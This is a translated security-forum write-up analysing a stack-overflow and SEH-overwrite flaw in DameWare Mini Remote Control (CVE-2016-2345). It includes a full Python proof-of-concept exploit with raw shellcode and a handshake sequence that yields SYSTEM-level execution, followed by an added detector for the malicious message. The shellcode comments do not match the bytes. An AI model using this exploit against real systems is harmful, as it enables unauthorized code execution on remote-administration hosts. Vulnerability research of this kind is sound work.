DameWare Mini Remote Control vulnerability (CVE-2016-2345): debugging analysis

Author: SaFeBuG@i春秋

Related vulnerability write-up: http://www.freebuf.com/articles/terminal/102204.html

Layout of the important parameters:

D380: input_buf, i.e. the packet carrying the shellcode that we send, size 0x430
F920: dst_buf, size 0x208
FB28: format_str, size 0x92

The key function is wsprintfW, whose maximum copy count is 0x400. Because this function operates on Unicode, it copies two bytes per iteration, so looping 0x400 times copies 0x800 bytes in total. Copying 0x800 bytes downward from F920 overwrites the entire stack region and triggers a page fault exception. We can therefore use this vulnerability to deliberately overwrite the head of the SEH chain: overwrite the first exception handler function address with a pop pop retn, overwrite the first exception handler chain (next-SEH) address with eb 06 90 90, and then overwrite the remaining part with our prepared call xxxx.

As shown in the figure below:

This vulnerability was only tested locally here; for remote testing, an IPv6 address must be used for it to succeed.

The IDA code segment is as follows:

This function must return non-zero for execution to reach the vulnerable point in the next step.

Test environment:

Windows 7 x86

Local test EXP code (local_exp.py):

import socket
import sys
import os
import time
import struct
import binascii
import random

# Python 2 script: str literals are raw byte strings, which the
# struct/socket calls below rely on.

# windows/exec - 220 bytes
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
# CMD=calc.exe

MsgBox = (
"\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64"
"\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B"
"\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20"
"\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07"
"\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
"\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7")

#pading = "A"*(0x20b+0x9) + "B"*(0x225-0x9)
#pading = "A"*(0x20b+0x9) + sc
# Layout of the 0x430-byte input_buf described in the analysis above:
# NOP sled + shellcode + filler, the SEH record (next-SEH = eb 06 90 90,
# handler = pop pop retn), a call back to the shellcode, trailing filler.
attack = ("\x90"*0x10 + MsgBox + "A"*(0x214 - 0x10 - len(MsgBox))
          + "B"*(0x162)
          + "\xeb\x06\x90\x90"        # next-SEH: jmp +6 over the handler slot
          + "\x6d\x14\x40\x00"        # SEH handler: pop pop retn
          + "\xe8\x37\xd4\xfe\xff"    # call xxxx back into the shellcode
          + "D"*(0xb6-0x4-0x5))
port = 6129

#if len (sys.argv) == 2:
# (progname, host ) = sys.argv
#else:
# print len (sys.argv)
# print 'Usage: {0} host'.format (sys.argv[0])
# exit (1)
host = '0:0:0:0:0:0:0:1'   # IPv6 loopback; the service is reached over IPv6
csock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
csock.connect((host, int(port)))

version = 444.0
buf = struct.pack("I", 4400)          # Init Version
buf += "\xcc"*4
buf += struct.pack("d", version)      # Minor Version
buf += struct.pack("d", version)      # Minor Version
buf += (40 - len(buf)) * "C"          # pad the init message to 40 bytes
csock.send(buf)
print binascii.hexlify(csock.recv(0x4000))  # necessary reads


buf = struct.pack("I", 0x9c44)  # msg type
#buf += pading #payload
buf += attack
#buf += ("%" + "\x00" + "c" + "\x00")
csock.send(buf)


print binascii.hexlify(csock.recv(0x4000))

csock.close()

A SYSTEM-level calc.
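For the defensive side, here is an added example (not from the original post) of a minimal detector for this message: it parses the 4-byte message type used above (0x9c44) and flags payloads larger than the 0x208-byte dst_buf, and separately the eb 06 90 90 next-SEH pattern from the analysis. The dst_buf threshold and the signature choice are my assumptions, and the sample messages are constructed.

```python
import struct

# From the page: the message type sent after the handshake, and the size of
# the stack destination buffer (dst_buf) the payload is formatted into.
MSG_TYPE_OVERFLOW = 0x9c44
DST_BUF_BYTES = 0x208
# Assumed signature for this example: the short jmp +6 placed in the
# next-SEH slot, as described in the analysis above.
NEXT_SEH_SHORT_JMP = b"\xeb\x06\x90\x90"


def inspect_message(data):
    """Classify one post-handshake message (4-byte little-endian type + payload).

    Returns (verdict, msg_type, payload_len); verdict is one of
    'short', 'ok', 'oversized', 'seh-overwrite'.
    """
    if len(data) < 4:
        return ("short", None, len(data))
    (msg_type,) = struct.unpack("<I", data[:4])
    payload = data[4:]
    if msg_type != MSG_TYPE_OVERFLOW:
        return ("ok", msg_type, len(payload))
    if len(payload) <= DST_BUF_BYTES:
        return ("ok", msg_type, len(payload))
    # Payload larger than dst_buf: the wsprintfW copy runs past the buffer.
    if NEXT_SEH_SHORT_JMP in payload:
        return ("seh-overwrite", msg_type, len(payload))
    return ("oversized", msg_type, len(payload))


def constructed_samples():
    """Constructed sample messages (not captured traffic) for exercising the check."""
    hdr = struct.pack("<I", MSG_TYPE_OVERFLOW)
    return {
        "benign": hdr + b"A" * 0x40,                      # fits in dst_buf
        "oversized": hdr + b"A" * 0x430,                  # same size as input_buf
        "seh": hdr + b"A" * 0x300 + NEXT_SEH_SHORT_JMP + b"D" * 0x100,
        "other": struct.pack("<I", 0x1234) + b"A" * 0x430,  # different msg type
    }


if __name__ == "__main__":
    for name, msg in constructed_samples().items():
        print(name, inspect_message(msg))
```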

Original post: http://bbs.ichunqiu.com/thread-13555-1-1.html?from=seebug